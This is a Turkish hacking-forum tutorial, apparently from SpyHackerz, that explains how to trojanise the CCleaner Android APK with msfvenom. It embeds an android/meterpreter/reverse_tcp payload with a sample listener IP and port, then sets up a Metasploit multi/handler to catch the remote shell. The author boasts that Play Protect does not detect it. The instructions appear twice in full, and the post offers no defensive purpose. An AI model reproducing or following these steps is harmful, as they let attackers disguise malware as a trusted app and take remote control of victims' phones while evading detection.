Öncelikle Bize Ccleaner Apk Lazım Google'den İndirebilirsiniz Ben v1.06.28 Sürümünü Kullanacağım.
Hemen Bir Konsol Açıyoruz Sizlerde Yüklüdür Belkide Garantiye Alalım İşimizi
apt-get İnstall Zipalign
apt-get İnstall Apktool
Komutlarını Sırasıyla Girip Enterliyoruz.
Şu şekilde:
İndirmeler Tamamlandıktan Sonra
Konsola msfvenom -x indirdiğiniz ccleaner adı -p android/meterpreter/reverse_tcp lhost=ip lport=port -o ccleaner.apk yazın.
ÖRNEK: msfvenom -x ccleanerv1.06.28.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=7777 -o ccleaner.apk
Ve Apk Dosyamız Çıktı.
Sonra Bir Konsol Daha Açın Sırasıyla Eervice Postgresql Start > Msfconsole Yazıp Enterleyin Ve Bekleyin
Msfconsole Açıldı Şimdi Use Exploit/Multi/Handler Komutunu Yazıp Enterliyoruz
Şimdide Set Payload Android/Meterpreter/Reverse_Tcp Yazıp Enterliyoruz
Son Aşamalardayız Set LHOST İp Yazıp Enterliyoruz Bu İp En Başta Backdoor Yaratırken Yazdığınız İp Olacak.
Son Olarak Exploit Yazarak Dinlemeye Alabilirsiniz Help Komutu İle Neler Yapabileceğinizi Görebilirsiniz
Play Protect Yakalamaz 2 Cihazda Denedim
Huawei P9 Lite 2018
Turkcell T80
Hemen Bir Konsol Açıyoruz Sizlerde Yüklüdür Belkide Garantiye Alalım İşimizi
apt-get İnstall Zipalign
apt-get İnstall Apktool
Komutlarını Sırasıyla Girip Enterliyoruz.
Şu şekilde:
İndirmeler Tamamlandıktan Sonra
Konsola msfvenom -x indirdiğiniz ccleaner adı -p android/meterpreter/reverse_tcp lhost=ip lport=port -o ccleaner.apk yazın.
ÖRNEK: msfvenom -x ccleanerv1.06.28.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=7777 -o ccleaner.apk
Ve Apk Dosyamız Çıktı.
Sonra Bir Konsol Daha Açın Sırasıyla Eervice Postgresql Start > Msfconsole Yazıp Enterleyin Ve Bekleyin
Msfconsole Açıldı Şimdi Use Exploit/Multi/Handler Komutunu Yazıp Enterliyoruz
Şimdide Set Payload Android/Meterpreter/Reverse_Tcp Yazıp Enterliyoruz
Son Aşamalardayız Set LHOST İp Yazıp Enterliyoruz Bu İp En Başta Backdoor Yaratırken Yazdığınız İp Olacak.
Son Olarak Exploit Yazarak Dinlemeye Alabilirsiniz Help Komutu İle Neler Yapabileceğinizi Görebilirsiniz
Play Protect Yakalamaz 2 Cihazda Denedim
Huawei P9 Lite 2018
Turkcell T80
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl